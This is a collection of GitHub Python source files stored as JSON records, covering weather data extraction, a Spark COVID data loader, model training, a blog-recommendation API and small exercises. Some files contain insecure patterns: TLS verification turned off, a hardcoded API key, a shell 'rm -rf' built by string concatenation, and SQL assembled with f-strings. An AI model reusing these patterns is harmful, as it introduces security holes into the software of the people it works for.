drop=False, inplace=True)\n selected = gpd.overlay(tracks, stations.to_crs(\n tracks.crs), how='intersection')\n selected['cpa'] = selected.apply(lambda x: vincenty(\n (x['lat'], x['lon']), (x['stnLat'], x['stnLon'])), axis=1)\n # Closest point of approach (CPA)\n stncpa = selected.loc[selected.groupby(['stnNum', 'num']).cpa.idxmin()]\n stncpa = stncpa.loc[stncpa.cpa < 250.]\n stncpa.drop('geometry', axis=1, inplace=True)\n stncpa.to_csv(\n r\"X:\\georisk\\HaRIA_B_Wind\\data\\derived\\tcobs\\stncpa.csv\", index=False)\n return stncpa\n\n\ndef extractObs(cpadf: pd.DataFrame, stations: pd.DataFrame) -> pd.DataFrame:\n outdf = pd.DataFrame(columns=['stnNum', 'stnName', 'dtObs', 'gust', 'gustq',\n 'direction', 'dtTC', 'TCName', 'TCIDnum',\n 'TCCPA'])\n cpagroup = cpadf.groupby('stnNum')\n for stnNum, group in cpagroup:\n # Load the data - need the state to determine offset from UTC\n stnState = stations.loc[stnNum, 'stnState'].strip()\n stnName = stations.loc[stnNum, 'stnName']\n dataFile = os.path.join(\n stationPath, f\"DC02D_Data_{stnNum:06d}_999999999632559.txt\")\n obsData = load_obs_data(dataFile, stnState)\n if obsData.empty:\n print(f\"No station observation data for {stnNum}\")\n continue\n\n obsData.set_index('datetime', inplace=True, drop=False)\n for idx, tc in group.iterrows():\n # First find the index of the obs data closest to the time of CPA\n try:\n indx = obsData.index.get_loc(\n tc.datetime, method='nearest', tolerance=pd.Timedelta('1D'))\n except KeyError:\n print(\n f\"No obs within 1 day of {tc.datetime} at {stnNum} for {tc.NAME}\")\n continue\n\n # Redundant?\n if indx == -1:\n breakpoint()\n if indx == 0:\n # No records:\n continue\n\n # Select the records either side of the selected time - maximum wind\n # gust may have occured on previous or following day compared to the\n # time of CPA (e.g. CPA at 01:00, but highest gust at 23:00 previous\n # day)\n obsgrp = obsData.iloc[indx-1:indx+2]\n # Now take the max value of those records:\n obs = obsgrp.loc[obsgrp['gust'].idxmax()]\n\n if obs.gust is not None:\n print(stnNum, obs.datetime, obs.gust,\n obs.direction, tc.datetime, tc.NAME, tc.cpa)\n outdf = outdf.append(\n pd.DataFrame([[stnNum, stnName, obs.datetime, obs.gust, obs.gust_q, obs.direction, tc.datetime, tc.NAME, tc.num, tc.cpa]],\n columns=['stnNum', 'stnName', 'dtObs', 'gust', 'gustq', 'direction', 'dtTC', 'TCName', 'TCIDnum', 'TCCPA']),\n ignore_index=True)\n return outdf\n\n\nstationPath = r\"X:\\georisk\\HaRIA_B_Wind\\data\\raw\\from_bom\\2019\\Daily\"\nstationFile = os.path.join(stationPath, \"DC02D_StnDet_999999999632559.txt\")\ntrackFile = r\"X:\\georisk\\HaRIA_B_Wind\\data\\raw\\from_bom\\tc\\IDCKMSTM0S - 20210722.csv\"\n\nstncpa = calculateCPA(stationFile, trackFile, 'raw')\nstations = load_stations(stationFile, 2)\noutdf = extractObs(stncpa, stations)\ntdiff = abs(outdf.dtObs - outdf.dtTC)\n\n# Remove any obs where the time difference between CPA and the obs is greater than 36 hours\noutdf = outdf[tdiff < pd.Timedelta('36h')]\noutdf.to_csv(\n r\"X:\\georisk\\HaRIA_B_Wind\\data\\derived\\tcobs\\stncpa_obs.csv\", index=False)\n\n\nfor stnNum, obs in outdf.groupby('stnNum'):\n if len(obs) > 10:\n print(stnNum, stations.loc[stnNum, 'stnName'], len(obs))\n obs.to_csv(os.path.join(r\"X:\\georisk\\HaRIA_B_Wind\\data\\derived\\tcobs\", f\"tcobs_{stnNum:06d}.csv\"), index=False)\n\n\n","repo_name":"wcarthur/processing","sub_path":"extract/extract_TC_station_passage.py","file_name":"extract_TC_station_passage.py","file_ext":"py","file_size_in_byte":13674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36031783741","text":"import requests, rarfile, json, warnings, io, time, os ,pandas as pd, shutil, stat\r\nfrom datetime import date\r\nfrom functools import reduce\r\nfrom pyspark.sql import SparkSession, DataFrame\r\n\r\nspark = SparkSession.builder.config(\"spark.driver.extraClassPath\", \"C:\\Spark\\mysql-connector-j-8.0.31.jar\").getOrCreate() #Iniciando a sessão Spark\r\n\r\n#Limpando o diretório, excluindo os CSV's do dia anterior para receber os novos do dia corrente \r\ndir1 = r\"G:\\Projetos_Python\\Spark\\csvs\"\r\nfor i in os.listdir(dir1):\r\n os.remove(os.path.join(dir1, i))\r\n\r\n#Minerando a URL principal para obter a URL dos arquivos do dia corrente\r\nurl = \"https://qd28tcd6b5.execute-api.sa-east-1.amazonaws.com/prod/PortalGeral\"\r\nhead = {\"X-Parse-Application-Id\": \"unAFkcaNDeXajurGB7LChj8SgQYS2ptm\"}\r\nreq = requests.get(url, headers=head)\r\nc_json = json.loads(req.content)\r\nurl2 = c_json[\"results\"][0][\"arquivo\"][\"url\"]\r\nm = url2[136:139]\r\n\r\n#Baixando os CSV's através da URL minerada, e extraindo para a pasta no diretório local\r\nwarnings.filterwarnings('ignore')\r\nresponse = requests.get(url2, verify = False, stream = True)\r\nfile = rarfile.RarFile(io.BytesIO(response.content))\r\nfile.extractall(r\"G:Projetos_Python\\Spark\\csvs\")\r\n\r\n#Listando os arquivos baixados para facilitar na hora de carregar os CSV's\r\ndir = os.listdir(r\"G:\\Projetos_Python\\Spark\\csvs\")\r\n\r\n#Carregando os CSV's já baixados e substituindo os valores N/A por \"Não Informado\" para facilitar no tratamento dos arquivos\r\ncsv20p1 = spark.read.csv(fr\"G:\\Projetos_Python\\Spark\\csvs\\{dir[0]}\", encoding='utf-8', sep=';', header=True).fillna(\"Não informado\")\r\ncsv20p2 = spark.read.csv(fr\"G:\\Projetos_Python\\Spark\\csvs\\{dir[1]}\", encoding='utf-8', sep=';', header=True).fillna(\"Não informado\")\r\ncsv21p1 = spark.read.csv(fr\"G:\\Projetos_Python\\Spark\\csvs\\{dir[2]}\", encoding='utf-8', sep=';', header=True).fillna(\"Não informado\")\r\ncsv21p2 = spark.read.csv(fr\"G:\\Projetos_Python\\Spark\\csvs\\{dir[3]}\", encoding='utf-8', sep=';', header=True).fillna(\"Não informado\")\r\ncsv22p1 = spark.read.csv(fr\"G:\\Projetos_Python\\Spark\\csvs\\{dir[4]}\", encoding='utf-8', sep=';', header=True).fillna(\"Não informado\")\r\ncsv22p2 = spark.read.csv(fr\"G:\\Projetos_Python\\Spark\\csvs\\{dir[5]}\", encoding='utf-8', sep=';', header=True).fillna(\"Não informado\")\r\ncsv23p1 = spark.read.csv(fr\"G:\\Projetos_Python\\Spark\\csvs\\{dir[6]}\", encoding='utf-8', sep=';', header=True).fillna(\"Não informado\")\r\n\r\n#Função para concatenar os DF's já excluindo as linhas que estão como \"Não informado\" na coluna \"codmun\", fiz esse tratamento para evitar informações desnecessárias\r\ndef unionAll(*dfs):\r\n return reduce(DataFrame.unionAll, dfs)\r\n\r\ndff = unionAll(csv20p1.filter(csv20p1.codmun != \"Não informado\"), csv20p2.filter(csv20p2.codmun != \"Não informado\"), csv21p1.filter(csv21p1.codmun != \"Não informado\"), csv21p2.filter(csv21p2.codmun != \"Não informado\")\r\n , csv22p1.filter(csv22p1.codmun != \"Não informado\"), csv22p2.filter(csv22p2.codmun != \"Não informado\"), csv23p1.filter(csv23p1.codmun != \"Não informado\"))\r\n\r\n#Ecluindo colunas desnecessárias\r\ndff = dff.drop(*(\"codRegiaoSaude\", \"nomeRegiaoSaude\", \"interior/metropolitana\",\"Recuperadosnovos\", \"emAcompanhamentoNovos\"))\r\n\r\n#Passando os dados do DF final já tratado para o BD passando como \"overwrite\" para sempre sobreescrever os dados antigos e ficar com os dados atualizados do dia\r\ndff.write.format('jdbc').options(url='jdbc:mysql://localhost:3306/covid_datasus',driver='com.mysql.jdbc.Driver',dbtable='covid',user='root',password='***').mode('overwrite').save()\r\n\r\n","repo_name":"adones15/Covid_Spark","sub_path":"projeto_spark_windows.py","file_name":"projeto_spark_windows.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34958425322","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nfrom configparser import ConfigParser\n\nBASE_DIR = os.path.dirname(__file__)\n\n\ndef closest_cfg(filename='history.cfg', path='../', prevpath=None):\n \"\"\"\n return the path of the closest history.cfg file\n :param filename: default get file name\n :param path:\n :param prevpath:\n :return:\n \"\"\"\n if path == prevpath:\n return ''\n\n path = os.path.abspath(path)\n cfgfile = os.path.join(path, filename)\n if os.path.exists(cfgfile):\n return cfgfile\n return closest_cfg(os.path.dirname(path), path)\n\n\ndef get_config(filename='run.cfg', path=''):\n \"\"\"\n more about read: https://docs.python.org/3/library/configparser.html\n :param filename:\n :param path:\n :return:\n \"\"\"\n cfg = ConfigParser()\n path = os.path.join(BASE_DIR, path)\n cfg.read(closest_cfg(filename=filename, path=path))\n return cfg\n\n\nif __name__ == '__main__':\n cfg = get_config()\n print(cfg.get('mongodb', 'ORDER_COLLECTION'))\n","repo_name":"DavidLin3/order_cart","sub_path":"app/utils/conf_util.py","file_name":"conf_util.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32752445092","text":"import os\n\n# Make Tensorflow less verbose\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\nfrom argparse import ArgumentParser\nfrom datetime import datetime\nfrom pathlib import Path\n\nfrom transformers import Seq2SeqTrainingArguments, Seq2SeqTrainer\nfrom transformers.trainer_utils import set_seed\n\nfrom datasets.utils import load_datasets\nfrom models.utils import load_model_and_tokenizer\nfrom metrics.rouge_score import RougeScore\n\nfrom utils import disable_tensorflow_gpu\nfrom utils.io import json_dump\n\n# Disable GPU for Tensorflow\ndisable_tensorflow_gpu()\n\n\ndef main(args):\n args.checkpoint_dir.mkdir(parents=True, exist_ok=True)\n json_dump(vars(args), args.checkpoint_dir / \"args.json\")\n\n set_seed(args.seed)\n\n model, tokenizer = load_model_and_tokenizer(\"models/mt5-small\")\n train_dataset, val_dataset = load_datasets(Path(\"dataset/\"), tokenizer=tokenizer)\n\n # val_dataset.size = 128\n\n training_args = Seq2SeqTrainingArguments(\n output_dir=args.checkpoint_dir,\n overwrite_output_dir=True,\n seed=args.seed,\n evaluation_strategy=\"steps\",\n fp16=args.fp16,\n num_train_epochs=args.num_epochs,\n adafactor=args.use_adafactor,\n learning_rate=args.learning_rate,\n weight_decay=args.weight_decay,\n per_device_train_batch_size=args.train_batch_size,\n per_device_eval_batch_size=args.eval_batch_size,\n gradient_accumulation_steps=args.gradient_accumulation_steps,\n predict_with_generate=True,\n dataloader_num_workers=args.num_workers,\n logging_steps=512 // args.train_batch_size,\n logging_dir=args.tb_log_dir,\n eval_steps=2048 // args.train_batch_size,\n save_steps=2048 // args.train_batch_size,\n )\n\n compute_metrics = None if not args.compute_rouge else RougeScore(tokenizer)\n\n trainer = Seq2SeqTrainer(\n model,\n args=training_args,\n train_dataset=train_dataset,\n eval_dataset=val_dataset,\n tokenizer=tokenizer,\n compute_metrics=compute_metrics,\n )\n\n trainer.train()\n\n\ndef parse_arguments():\n parser = ArgumentParser()\n parser.add_argument(\"--name\", default=\"TEST\")\n parser.add_argument(\"--checkpoint_dir\", type=Path)\n parser.add_argument(\"--tb_log_dir\", type=Path)\n\n parser.add_argument(\"--do_train\", action=\"store_true\")\n parser.add_argument(\"--do_eval\", action=\"store_true\")\n\n # Trainer\n parser.add_argument(\"--use_adafactor\", action=\"store_true\")\n parser.add_argument(\"--learning_rate\", type=float, default=5e-5)\n parser.add_argument(\"--weight_decay\", type=float, default=0)\n parser.add_argument(\"--num_epochs\", type=int, default=5)\n parser.add_argument(\"--train_batch_size\", type=int, default=2)\n parser.add_argument(\"--eval_batch_size\", type=int, default=4)\n parser.add_argument(\"--gradient_accumulation_steps\", type=int, default=8)\n parser.add_argument(\"--no_fp16\", dest=\"fp16\", action=\"store_false\")\n parser.add_argument(\"--no_compute_rouge\", dest=\"compute_rouge\", action=\"store_false\")\n\n parser.add_argument(\"--seed\", type=int, default=0x06902029)\n parser.add_argument(\"--num_workers\", type=int, default=4)\n\n args = parser.parse_args()\n\n if args.checkpoint_dir is None:\n args.checkpoint_dir = Path(\"checkpoints\") / args.name\n\n if args.tb_log_dir is None:\n args.tb_log_dir = Path(\"runs\") / (args.name + \"_\" + datetime.now().strftime(\"%m%d-%H%M\"))\n\n return args\n\n\nif __name__ == \"__main__\":\n main(parse_arguments())\n","repo_name":"jimpei8989/ADL-HW3","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"26787410444","text":"##Your Life in Weeks Calculator\n\nname = input('what is your name?')\nage = input('what is your current age?')\n\nremaining_age = 90 - int(age)\n\ndays = int(remaining_age * 365)\nweeks = int(remaining_age * 52)\nmonths = int(remaining_age * 12)\n\nprint(f'{name},You have {days} days, {weeks} weeks, and {months} months left.')\n\n\n##Day_02 Tip Calculator\n\nprint('Welocme to the tip calculator')\ntotal_bill = float(input('what was the total bill? $\\n'))\ntip = int(input('what percentage tip would you like to give? 10, 12, or 15?\\n'))\npercentage_tip = (total_bill * tip) / 100\ntotal = float(total_bill + percentage_tip)\nspliting_bill = int(input('How many people to split the bill?'))\nprint(f\"Each person should pay: {total / spliting_bill}\")\n\n","repo_name":"MUSTAFAREZA47/Python","sub_path":"Learnig_Python/Day_02.py","file_name":"Day_02.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4767326487","text":"from tokenizer import Token\nfrom datatypes import linked_list\n\n__all__ = ['parse']\n\ndef parse(tokens):\n try:\n return match_exprs(tokens)\n except SystemExit:\n pass\n except KeyboardInterrupt:\n pass\n except Exception as e:\n raise\n\ndef match_exprs(tokens):\n out = []\n index = 0\n while index < len(tokens):\n match = match_expr(tokens[index:])\n try:\n out.append(match[0])\n index += match[1]\n except TypeError:\n raise SyntaxError(\"Syntax Error at line %s, %s...\"%(tokens[index][1], tokens[index][0]))\n return out\n\ndef match_expr(tokens):\n return match_literal(tokens) or match_compound(tokens)\n\ndef match_compound(tokens):\n out = []\n index = 1\n if tokens[0][0] is not Token.left_paren:\n return\n while True:\n head = tokens[index:]\n if not head:\n raise SyntaxError(\"EOF while scanning for closing parens\")\n if head[0][0] is Token.right_paren:\n return (linked_list(out), tokens[0][1]), index+1\n match = match_expr(head)\n if not match:\n raise SyntaxError(\"Syntax Error at line %s, %s...\"%(head[0][1], [x[0] for x in head[:5]]))\n out.append(match[0])\n index += match[1]\n\ndef match_literal(tokens):\n if not isinstance(tokens[0][0], Token):\n return tokens[0], 1\n\nif __name__ == '__main__':\n import tokenizer\n while True:\n print((parse(tokenizer.tokenize(raw_input('parser> ')))))\n","repo_name":"Joshua-Chin/jcli","sub_path":"parser_.py","file_name":"parser_.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"3728833249","text":"import os.path\nfrom app import *\nfrom Recommend_Blogs import Using_Cosine_Similarity\n\n\n@app.get('/')\nasync def root():\n return {\"message\": \"Welcome to the Blog API Created by Yaksh Shah\"}\n\n\n@app.post('/register/name/{user_name}/email/{user_email}')\nasync def register_user(user_name: str, user_email: str):\n user_query = ''' insert into user_profile(user_name,user_email,user_pic)\n values(%s,%s,%s) '''\n user_info = (user_name, user_email, 'default_profile_pic.jpg')\n # execute the query\n cursor.execute(user_query, user_info)\n mydb.commit()\n return \"User Registeration Completed\"\n\n\n@app.get('/login/email/{user_email}')\nasync def user_login(user_email: str):\n cursor.execute(''' select user_id,user_name,user_email from user_profile \n where user_email=%s''',\n [user_email])\n resp = cursor.fetchone()\n if resp is not None:\n user_details = {'user_id': resp[0], 'user_name': resp[1], 'user_email': resp[2], \"user_res\": \"Found\"}\n update_user_rating(user_details['user_id'])\n return user_details\n else:\n return {\"user_res\": \"Not Found\"}\n\n\n@app.post('/update/name/{user_name}/id/{user_id}')\nasync def update_user_name(user_name: str, user_id: int):\n cursor.execute(\"\"\" update user_profile set user_name=%s where user_id=%s\"\"\",\n [user_name, user_id])\n # execute the query\n mydb.commit()\n return \"User Name Updated\"\n\n\n@app.post('/update/image/{user_pic}/id/{user_id}')\nasync def update_user_profile_pic(user_pic: str, user_id: int):\n cursor.execute(\"\"\" update user_profile set user_pic=%s where user_id=%s\"\"\",\n [user_pic, user_id])\n # execute the query\n mydb.commit()\n return \"User Profile Pic Updated\"\n\n\n@app.get('/name/{user_name}')\nasync def verify_user_name(user_name: str):\n cursor.execute(''' SELECT user_name from user_profile \n where user_name=%s''', [user_name])\n result = cursor.fetchone()\n if result:\n return \"unique\"\n else:\n return \"not unique\"\n return result\n\n\n@app.get('/image/id/{user_id}')\nasync def get_user_profile_pic(user_id: int):\n cursor.execute(\"\"\" select user_pic from user_profile where user_id=%s\"\"\", [user_id])\n resp = cursor.fetchone()\n user_img = {\"user_img\": resp[0]}\n return user_img\n\n\n@app.get('/blogs')\nasync def get_blogs_for_home_before_login():\n on_start()\n top_rated_blogs = ratings_df[ratings_df['ratings'] <= 3.5].value_counts().head(30000)\n top_blog_ids = list(set([x[0] for x in top_rated_blogs.index]))\n cursor.execute(f\"\"\" select * from blogs where blog_id in {tuple(top_blog_ids)} order by rand() limit 30\"\"\")\n blogs_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blogs_list)\n return blog_json\n\n\n@app.get('/blogs/{user_id}')\nasync def get_blogs_for_home_after_login(user_id: int):\n blog_id_not_to_consider_tuple = get_blogs_not_to_consider(user_id)\n if blog_id_not_to_consider_tuple is not None:\n cursor.execute(f\"\"\" select * from blogs where blog_id order by rand() limit 30\"\"\")\n else:\n cursor.execute(\n f\"\"\" select * from blogs where blog_id not in {blog_id_not_to_consider_tuple} order by rand() limit 30\"\"\")\n blogs_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blogs_list)\n return blog_json\n\n\n@app.get('/recommended/no/activity/blogs')\nasync def get_recommended_blogs_for_user_with_no_activity():\n top_rated_blogs = ratings_df[ratings_df['ratings'] > 3.5].value_counts().head(30000)\n top_blog_ids = list(set([x[0] for x in top_rated_blogs.index]))\n cursor.execute(f\"\"\" select * from blogs where blog_id in {tuple(top_blog_ids)} order by rand() limit 20\"\"\")\n blogs_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blogs_list)\n return blog_json\n\n\n@app.get('/recommend/blogs/using/rbm/{user_id}')\nasync def get_recommended_blogs_using_rbm(user_id: int):\n path = os.path.abspath('Recommend_Blogs/RecommendedBlogs/top_k_reco.csv')\n top_reco_df = pd.read_csv(path)\n top_reco_list = top_reco_df[top_reco_df['userId'] == user_id]['blog_id'].values\n cursor.execute(f'select * from blogs where blog_id in {tuple(top_reco_list)}')\n blog_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blog_list)\n return blog_json\n\n@app.get('/recommend/similar/blogs/{user_id}')\nasync def get_recommended_blogs_using_cosine_similarity(user_id: int):\n cursor.execute('select * from ratings where user_id=%s', [user_id])\n ratings_list = cursor.fetchall()\n ratings_json = get_user_ratings_in_json_format(ratings_list)\n if len(ratings_json) < 3:\n return []\n else:\n blogs_json = []\n recommended_blogs = Using_Cosine_Similarity.get_similar_blog(blogs_json, ratings_json)\n recommended_blogs_json = get_blogs_for_recommendation(tuple(recommended_blogs))\n return recommended_blogs_json\n\n\n@app.get('/like/blogs/{user_id}')\nasync def get_liked_blogs(user_id: int):\n cursor.execute(\"\"\"select blog_id from likes where user_id=%s\"\"\", (user_id,))\n liked_blogs = cursor.fetchall()\n blog_id_tuple = ()\n blog_id_list = []\n blog_json = []\n blog_list = []\n if liked_blogs != []:\n for id in liked_blogs:\n blog_id_list.append(id[0])\n blog_id_tuple = tuple(blog_id_list)\n if len(blog_id_tuple) > 1:\n cursor.execute(f\"\"\" select * from blogs where blog_id in {blog_id_tuple}\"\"\")\n blogs_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blogs_list)\n else:\n cursor.execute(f\"\"\" select * from blogs where blog_id={blog_id_tuple[0]}\"\"\")\n blogs_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blogs_list)\n\n return blog_json\n else:\n return {\"res\": \"Not Found\"}\n\n\n@app.get('/favourites/blogs/{user_id}')\nasync def get_favourites_blogs(user_id: int):\n cursor.execute(\"select blog_id from favourites where user_id=%s\", (user_id,))\n favourites_blogs = cursor.fetchall()\n blog_id_tuple = ()\n blog_id_list = []\n if favourites_blogs != []:\n for id in favourites_blogs:\n blog_id_list.append(id[0])\n blog_id_tuple = tuple(blog_id_list)\n if len(blog_id_tuple) > 1:\n cursor.execute(f\"\"\" select * from blogs where blog_id in {blog_id_tuple}\"\"\")\n blogs_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blogs_list)\n else:\n cursor.execute(f\"\"\" select * from blogs where blog_id={blog_id_tuple[0]}\"\"\")\n blogs_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blogs_list)\n return blog_json\n else:\n return {\"res\": \"Not Found\"}\n\n\n@app.post('/content/seen/user/{user_id}/blog/{blog_id}')\nasync def seen_blog_content(user_id: int, blog_id: int):\n result = add_user_ratings(user_id, blog_id)\n return result\n\n\n@app.post('/likes/user/{user_id}/blog/{blog_id}')\nasync def like_blog(user_id: int, blog_id: int):\n cursor.execute(\"\"\"select * from likes where blog_id=%s and user_id=%s\"\"\", [blog_id, user_id])\n if cursor.fetchone():\n return \"Already exist\"\n else:\n curr_time = datetime.now(timezone(\"Asia/Kolkata\")).strftime('%Y-%m-%d %H:%M:%S')\n datetime_obj = datetime.strptime(curr_time, '%Y-%m-%d %H:%M:%S')\n cursor.execute(\"\"\"insert into likes(user_id,blog_id,date_created)values(%s,%s,%s)\"\"\",\n [user_id, blog_id, datetime_obj])\n mydb.commit()\n add_user_ratings(user_id, blog_id)\n return \"liked\"\n\n\n@app.delete('/deletelike/user/{user_id}/blog/{blog_id}')\nasync def unlike_blog(user_id: int, blog_id: int):\n cursor.execute(\"\"\" delete from likes where user_id=%s and blog_id=%s\"\"\", (user_id, blog_id))\n mydb.commit()\n return \"unliked\"\n\n\n@app.post('/favourites/user/{user_id}/blog/{blog_id}')\nasync def add_blog_to_favourites(user_id: int, blog_id: int):\n cursor.execute(\"\"\"select * from favourites where blog_id=%s and user_id=%s\"\"\", [blog_id, user_id])\n if cursor.fetchone():\n return \"Already exist\"\n else:\n cursor.execute(\"\"\"insert into favourites(user_id,blog_id)values(%s,%s)\"\"\", [user_id, blog_id])\n mydb.commit()\n add_user_ratings(user_id, blog_id)\n return \"Added to Favourites\"\n\n\n@app.delete('/removefromfavourites/user/{user_id}/blog/{blog_id}')\nasync def remove_blog_from_favourites(user_id: int, blog_id: int):\n cursor.execute(\"\"\" delete from favourites where user_id=%s and blog_id=%s\"\"\", (user_id, blog_id))\n mydb.commit()\n return \"Removed from Favourites\"\n\n# uvicorn app.main:app --reload\n","repo_name":"shahyaksh/Blog-Recommendation-System","sub_path":"BlogAPI/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7586930683","text":"import boto3\nimport json\nimport os\n\ndef lambda_handler(event, context):\n sf = boto3.client('stepfunctions')\n\n for record in event['Records']:\n bucket = record['s3']['bucket']['name']\n key = record['s3']['object']['key']\n datas = key.split(\"/\")\n \n datas = {\n \"bucket\": bucket,\n \"key\": key,\n \"size\": record['s3']['object']['size'],\n \"user\": datas[1]\n }\n \n sf.start_execution(\n stateMachineArn=os.environ[\"ARN_IMAGE_PROCESSING\"],\n input=json.dumps(datas)\n )\n","repo_name":"yannistannier/AWS-scripts","sub_path":"lambda/startImageProcessing/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43271061054","text":"# faça um programa que leia 3 números e diga qual é o maior e qual é o menor dentre os 3.\na = int(input('Digite um número: '))\nb = int(input('Digite um número: '))\nc = int(input('Digite um número: '))\nmaior = a\nif b > a and b > c:\n maior = b\nif c > a and c > b:\n maior = c\nprint('O maior dentre os 3 números digitados é o {}.'.format(maior))\n#verificando o menor número dentre os 3.\nmenor = a\nif b < a and b < c:\n menor = b\nif c < a and c < b:\n menor = c\nprint('O meno dentre os 3 números digitados é o {}.'.format(menor))\n","repo_name":"Lucas-Fernandes-Dias/Python-CursoemVideo","sub_path":"Exércicios/100Exercícios/ex033.py","file_name":"ex033.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70508682349","text":"#!/usr/bin/python\n\nimport urllib2\nimport json\nimport sys\nimport os\nimport logging\n\nfrom bs4 import BeautifulSoup\n\nlogging.basicConfig(level='DEBUG')\n\nBASE_URL = \"http://docs.hortonworks.com\"\n\nTARGET_DIR = \"target\"\n\nCURR_DIR = os.path.dirname(os.path.realpath(__file__))\n\nclass Downloader:\n\n def __init__(self, url):\n self.url = url\n logging.info(\"Init URL: [%s]\" % url)\n self.target = CURR_DIR + \"/../\" + TARGET_DIR\n\n def parse(self):\n #html = urllib2.urlopen(self.url, timeout=30).read()\n parsed_html = BeautifulSoup(open(self.url), \"html.parser\") \n content = parsed_html.body.find_all('div', class_=\"title\")\n \n def extract_name(href):\n return href[href.rfind('/') + 1:]\n \n def extract_href(href):\n if href.find('..') > 0:\n ary = href.split(\"/\")\n index = ary.index(\"..\")\n num = 0\n for i in ary:\n if i == \"..\":\n num = num + 1\n del ary[(index - num):(index + num)]\n return '/'.join(ary)\n else:\n return href\n \n for item in content:\n if item:\n link = item.find('a', class_=\"pdf-link\")\n if link:\n href = link['href']\n name = extract_name(href)\n yield (name, BASE_URL + extract_href(href))\n \n \n def download(self, item): \n logging.info(\"Downloading [name=%s, url=%s]\" % item)\n p = self.target + \"/\" + item[0]\n with open(p, 'w') as file:\n logging.info(\"Saving at [%s]\" % p)\n file.write(urllib2.urlopen(item[1]).read())\n \n def main(self):\n # clear\n if os.path.exists(self.target) and os.path.isdir(self.target):\n os.system('rm -rf ' + self.target)\n \n os.mkdir(self.target)\n \n for item in self.parse():\n if os.path.isfile(item[0]) > 0 and os.path.getsize(item[0]) > 0: continue\n self.download(item) \n \nif __name__ == '__main__':\n\n if len(sys.argv) != 2:\n logging.info(\"Please giving url which should download.\") \n sys.exit(1)\n \n downloader = Downloader(sys.argv[1])\n downloader.main()\n ","repo_name":"liqingfei/hortonworks-books-spider","sub_path":"src/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20926320667","text":"# -*- coding: utf-8 -*-\nfrom nbautoeval.exercise_function import ExerciseFunction\nfrom nbautoeval.args import Args\n\n\n# @BEG@ name=tri_selection\ndef tri_selection(list):\n '''la liste list est triée à l'aide de la méthode du tri par sélection'''\n for i in range(len(list)):\n mini = i\n for j in range(i, len(list)):\n if list[j] < list[mini]:\n mini = j\n list[i], list[mini] = list[mini], list[i]\n return list\n# @END@\n\n\n\ninputs_tri_selection = [\n Args([1, 10, 3, 5]),\n Args([10, 2, 8, 1, 0]),\n Args([5, 1, 3]),\n Args([15, 10, 14, 12, 8, 21]),\n \n]\n\n\n\nexo_tri_selection = ExerciseFunction(\n tri_selection, inputs_tri_selection)\n","repo_name":"misterned/bloc2","sub_path":"corrections/exo_tri_selection.py","file_name":"exo_tri_selection.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19176497027","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nimport json\nfrom models import Customer,product,emp\nfrom serializers import ExSerializer,ExSerializerGet,EmpSerializes\nfrom rest_framework import status\n\n# Create your views here.\nclass customerViwe(APIView):\n\tdef put(self,request):\n\t\treturn Response(\"helll word\")\n\tdef post(self,request):\n\t\tcus=Customer(**request.data)\n\t\tcus.save()\n\t\treturn Response(\" cusert save\")\n\tdef get(self,request):\n\t\tcust=[ i.name for i in Customer.objects.all()]\n\t\treturn Response(cust)\nclass productViwe(APIView):\n\tdef post(self,request):\n\t\ttry:\t\t\n\t\t\tpoduct = ExpSerializer(data=request.data)\n\t\t\tif poduct.is_valid():\n\t\t\t\tpoduct.save()\n\t\t\t\treturn Response(\"poduct created successfully\")\n\t\t\telse:\n\t\t\t\treturn Response(poduct._errors,\n\t\t\t\t\tstatus=status.HTTP_400_BAD_REQUEST)\n\t\texcept Exception as err:\n\t\t\treturn Response(err.message,\n\t\t\t\tstatus=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\tdef get(self,request):\n\t\tdata=product.objects.all()\n\t\tpd=ExSerializerGet(data,many=True)\n\t\treturn Response(pd.data)\nclass empView(APIView):\n\tdef put(self,request):\n\t\treturn Response(\"wellcome to emp\")\n\tdef post(self,request):\n\t\tEmp=EmpSerializes(data=request.data)\n\t\tif Emp.is_valid():\n\t\t\tEmp.save()\n\t\t\treturn Response(\"created successfully\")\n\tdef get(self,request):\n\t\tEmp=emp.objects.all()\n\t\tsr=EmpSerializes(Emp,many=True)\n\t\treturn 